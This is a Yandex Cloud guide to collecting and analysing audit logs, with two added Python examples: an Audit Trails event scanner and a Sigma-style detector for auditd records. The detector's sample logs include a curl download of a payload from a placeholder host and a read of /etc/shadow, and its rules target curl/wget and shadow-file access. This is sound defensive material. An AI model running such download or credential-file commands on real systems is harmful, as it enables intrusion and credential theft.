Collecting, monitoring, and analyzing audit logs
An audit log is a record of all events in the system, including access to it and operations performed. By collecting and verifying audit logs, you can monitor compliance with the established security procedures and standards and identify vulnerabilities in your security mechanisms.
Events in audit logs occur on different levels:
- Yandex Cloud level: Events that occur with Yandex Cloud resources.
- OS level.
- Application level.
- Network level (Flow Logs).
Note
For more information about Kubernetes events, see Collecting, monitoring, and analyzing audit logs in Yandex Managed Service for Kubernetes.
Yandex Cloud level
Collecting events
The main tool for collecting Yandex Cloud level logs is Yandex Audit Trails. This service allows you to collect audit logs about events happening to Yandex Cloud resources and upload these logs to Yandex Object Storage buckets or Cloud Logging log groups for further analysis or export. For more information, refer to this guide on how to start collecting logs. You can also learn more about the event format or check out the event reference.
Note
See the Yandex Object Storage security guidelines in Object Storage.
To collect metrics, analyze Yandex Cloud-level events, and set up notifications, we recommend using Yandex Monitoring. It helps you track, for example, a sharp increase in the load on Compute Cloud, the number of Application Load Balancer requests per second (RPS), or significant changes in event statistics in Identity and Access Management.
You can also use Monitoring to monitor the health of the Audit Trails service itself and track security events.
You can export audit logs to a log group in Cloud Logging and to a customer's SIEM system to analyze information about events and incidents.
List of important Yandex Cloud-level events for search in audit logs:
Exporting events to SIEM
Audit Trails
Solutions for exporting Yandex Cloud audit logs are available for the following SIEM systems:
- ArcSight
- Splunk
Utilities like GeeseFS or s3fs can help set up export to any SIEM. They allow you to mount a Yandex Object Storage bucket as a VM's local disk. Next, you need to install a SIEM connector on the VM and configure it to read the JSON files from the mounted bucket.
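The following is an added example (not Yandex code and not part of this page) of the reading step described above: it walks a directory such as a GeeseFS or s3fs mount point, parses each Audit Trails JSON file, and flags the events a SIEM analyst would want surfaced first (denied requests, access-rights changes, security group changes). The top-level field names (`event_type`, `authorization.authorized`, `authentication`, `request_metadata`) follow the Audit Trails event format, but the sample events, the `event_type` strings, the file layout under the mount point, and the assumption that a file holds either a JSON array or newline-delimited JSON are constructed for the example; verify them against the event reference before relying on them.

```python
"""Scan Audit Trails JSON files in a mounted bucket directory and flag notable events.

Added example, not Yandex Cloud code. Event field names follow the Audit Trails
event format; sample values and event_type strings are constructed placeholders.
"""
import json
import tempfile
from pathlib import Path

# Constructed sample events. The event_type strings are placeholders, check the
# Audit Trails event reference for the real names of the events you care about.
SAMPLE_EVENTS = [
    {
        "event_id": "evt-0001",
        "event_source": "iam",
        "event_type": "yandex.cloud.audit.iam.UpdateFolderAccessBindings",
        "event_time": "2024-01-15T10:00:00Z",
        "authentication": {"subject_type": "YANDEX_PASSPORT_USER_ACCOUNT", "subject_name": "alice@example.com"},
        "authorization": {"authorized": True},
        "request_metadata": {"remote_address": "198.51.100.10"},
        "event_status": "DONE",
    },
    {
        "event_id": "evt-0002",
        "event_source": "compute",
        "event_type": "yandex.cloud.audit.compute.CreateInstance",
        "event_time": "2024-01-15T10:05:00Z",
        "authentication": {"subject_type": "SERVICE_ACCOUNT", "subject_name": "ci-deployer"},
        "authorization": {"authorized": True},
        "request_metadata": {"remote_address": "198.51.100.20"},
        "event_status": "DONE",
    },
    {
        "event_id": "evt-0003",
        "event_source": "iam",
        "event_type": "yandex.cloud.audit.iam.CreateServiceAccount",
        "event_time": "2024-01-15T10:07:00Z",
        "authentication": {"subject_type": "YANDEX_PASSPORT_USER_ACCOUNT", "subject_name": "bob@example.com"},
        "authorization": {"authorized": False},
        "request_metadata": {"remote_address": "203.0.113.5"},
        "event_status": "ERROR",
    },
    {
        "event_id": "evt-0004",
        "event_source": "vpc",
        "event_type": "yandex.cloud.audit.vpc.UpdateSecurityGroupRules",
        "event_time": "2024-01-15T10:09:00Z",
        "authentication": {"subject_type": "YANDEX_PASSPORT_USER_ACCOUNT", "subject_name": "alice@example.com"},
        "authorization": {"authorized": True},
        "request_metadata": {"remote_address": "198.51.100.10"},
        "event_status": "DONE",
    },
]


def load_events(path):
    """Parse one exported file: a JSON array of events or newline-delimited JSON (assumed layouts)."""
    text = Path(path).read_text(encoding="utf-8").strip()
    if not text:
        return []
    if text[0] == "[":
        return json.loads(text)
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def reasons_for(event):
    """Return the list of reasons this event deserves SIEM attention (empty if none)."""
    reasons = []
    event_type = event.get("event_type", "")
    # A request the service refused: someone tried an action they are not allowed to perform.
    if event.get("authorization", {}).get("authorized") is False:
        reasons.append("denied_request")
    # Any IAM change to access bindings alters who can do what in the cloud or folder.
    if event_type.startswith("yandex.cloud.audit.iam.") and "AccessBindings" in event_type:
        reasons.append("access_rights_changed")
    # Security group edits change the network exposure of resources.
    if "SecurityGroup" in event_type:
        reasons.append("security_group_changed")
    return reasons


def scan_directory(root):
    """Walk the mount point and return a flat list of flagged events with the fields a SIEM needs."""
    findings = []
    for path in sorted(Path(root).rglob("*.json")):
        for event in load_events(path):
            reasons = reasons_for(event)
            if reasons:
                findings.append({
                    "event_id": event.get("event_id"),
                    "event_type": event.get("event_type"),
                    "subject": event.get("authentication", {}).get("subject_name"),
                    "source_ip": event.get("request_metadata", {}).get("remote_address"),
                    "reasons": reasons,
                    "file": path.name,
                })
    return findings


def write_sample_bucket(root):
    """Create a constructed bucket layout: one array-format file and one JSONL file."""
    day_dir = Path(root) / "2024" / "01" / "15"
    day_dir.mkdir(parents=True, exist_ok=True)
    (day_dir / "part-0001.json").write_text(json.dumps(SAMPLE_EVENTS[:2]), encoding="utf-8")
    jsonl = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS[2:]) + "\n"
    (day_dir / "part-0002.json").write_text(jsonl, encoding="utf-8")
    return root


def run_demo():
    """Build the sample bucket in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_directory(write_sample_bucket(tmp))


if __name__ == "__main__":
    for finding in run_demo():
        print(json.dumps(finding))
```

In a real deployment, `scan_directory` would be pointed at the GeeseFS or s3fs mount point and its output handed to the SIEM connector; the three rules in `reasons_for` are deliberately minimal and are where the list of important events for your environment would go.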
Yandex Monitoring metrics
You can export metrics to a SIEM system via the API, see the instructions.
Responding to events
Using Yandex Cloud Functions, you can configure alerts about Audit Trails events, as well as automatic responses to malicious actions, including removing dangerous rules or revoking access rights.
OS level
When using IaaS cloud services and Kubernetes node groups, the customer is responsible for ensuring OS security and collecting OS-level events on their own. Free tools for collecting standard OS-generated events and exporting them to the customer's SIEM system include:
Additional event generation options can be implemented using Auditd for Linux or Sysmon for Windows.
You can collect Linux system metrics (CPU, RAM, and disk space usage) with Unified Agent Monitoring.
You can also export OS events to Cloud Logging using a Fluent Bit plugin.
To describe events to be searched for in audit logs, we recommend using Sigma.
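As an added example (not Yandex code and not part of this page) of what the Sigma recommendation looks like in practice on OS-level events, the block below parses auditd records of the kind Auditd on Linux produces, evaluates two rules written with Sigma's `detection` structure (named selections, field modifiers such as `|endswith`, and a `condition` such as `selection and not filter`), and reports the record serial numbers that match. The auditd lines are constructed, the rule titles are the author's own, and the condition evaluator deliberately supports only the simple `and`/`or`/`not` conditions, not parentheses or Sigma's `1 of` aggregations.

```python
"""Evaluate Sigma-style detection rules against auditd records.

Added example, not Yandex Cloud code. The log lines and rules are constructed.
"""
import re

# Constructed auditd lines (not real captures). Records sharing a serial (201, 202)
# belong to the same auditd event.
AUDITD_LINES = [
    'type=SYSCALL msg=audit(1700000000.101:201): arch=c000003e syscall=59 success=yes exit=0 '
    'ppid=1200 pid=1234 uid=1000 auid=1000 comm="curl" exe="/usr/bin/curl" key="exec"',
    'type=EXECVE msg=audit(1700000000.101:201): argc=3 a0="curl" a1="-s" a2="http://example.invalid/payload"',
    'type=SYSCALL msg=audit(1700000000.202:202): arch=c000003e syscall=257 success=no exit=-13 '
    'ppid=1200 pid=1240 uid=1000 auid=1000 comm="cat" exe="/usr/bin/cat" key="etc_shadow"',
    'type=PATH msg=audit(1700000000.202:202): item=0 name="/etc/shadow" inode=1234 mode=0100640 ouid=0 ogid=42',
]

# Rules in Sigma's detection layout: selections are AND-ed field maps, list values are OR-ed,
# "field|modifier" keys apply contains/startswith/endswith, and condition combines selections.
RULES = [
    {
        "title": "Download tool executed (auditd EXECVE)",
        "detection": {
            "selection": {"type": "EXECVE", "a0": ["curl", "wget"]},
            "condition": "selection",
        },
    },
    {
        "title": "Failed read of /etc/shadow by non-root login session",
        "detection": {
            "selection": {"type": "SYSCALL", "success": "no", "key|endswith": "shadow"},
            "filter": {"auid": "0"},
            "condition": "selection and not filter",
        },
    },
]

RECORD_HEADER = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\):\s*(.*)$")
KEY_VALUE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S*)')


def parse_auditd_line(line):
    """Turn one auditd record into a flat dict; quoted values lose their quotes. None if not a record."""
    match = RECORD_HEADER.match(line.strip())
    if not match:
        return None
    rec_type, timestamp, serial, body = match.groups()
    fields = {"type": rec_type, "timestamp": timestamp, "serial": serial}
    for key, value in KEY_VALUE.findall(body):
        fields[key] = value[1:-1] if value.startswith('"') else value
    return fields


def field_matches(actual, expected, modifier):
    """Compare one field value using an optional Sigma modifier."""
    if actual is None:
        return False
    if modifier == "contains":
        return expected in actual
    if modifier == "startswith":
        return actual.startswith(expected)
    if modifier == "endswith":
        return actual.endswith(expected)
    return actual == expected


def selection_matches(fields, selection):
    """All entries of a selection must match; a list value matches if any element does."""
    for spec, expected in selection.items():
        name, _, modifier = spec.partition("|")
        candidates = expected if isinstance(expected, list) else [expected]
        if not any(field_matches(fields.get(name), str(c), modifier) for c in candidates):
            return False
    return True


def evaluate_condition(condition, results):
    """Evaluate 'a and not b or c' style conditions (no parentheses, no '1 of' aggregations)."""
    def term(token):
        negate = token.startswith("not ")
        value = results[token[4:] if negate else token]
        return not value if negate else value
    return any(all(term(t.strip()) for t in clause.split(" and ")) for clause in condition.split(" or "))


def match_rules(fields, rules):
    """Return titles of all rules whose condition holds for this record."""
    hits = []
    for rule in rules:
        detection = rule["detection"]
        results = {name: selection_matches(fields, sel) for name, sel in detection.items() if name != "condition"}
        if evaluate_condition(detection["condition"], results):
            hits.append(rule["title"])
    return hits


def scan_lines(lines, rules=RULES):
    """Return (serial, rule title) pairs for every matching auditd record."""
    findings = []
    for line in lines:
        fields = parse_auditd_line(line)
        if fields is None:
            continue
        for title in match_rules(fields, rules):
            findings.append((fields["serial"], title))
    return findings


if __name__ == "__main__":
    for serial, title in scan_lines(AUDITD_LINES):
        print(f"audit serial {serial}: {title}")
```

The serial number returned with each hit is what lets an analyst pull the sibling records (the EXECVE arguments, the PATH entry) of the same auditd event from the SIEM; the `filter` section in the second rule shows the usual Sigma pattern for suppressing an expected actor, here the root login session.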
Application level
Customers may collect events that occur at the level of applications deployed on Compute Cloud resources on their own. For example, save application logs to files and transfer them to a SIEM system using the tools listed in OS level above.
Network level
Currently, VPC network traffic event logs (Flow Logs) can only be collected by customers. You can use Yandex Cloud Marketplace solutions (such as NGFW, IDS/IPS, or network products) or free software for collecting and transmitting events.
Time synchronization
To get the exact time of OS- and application-level events, configure clock synchronization by following the instructions.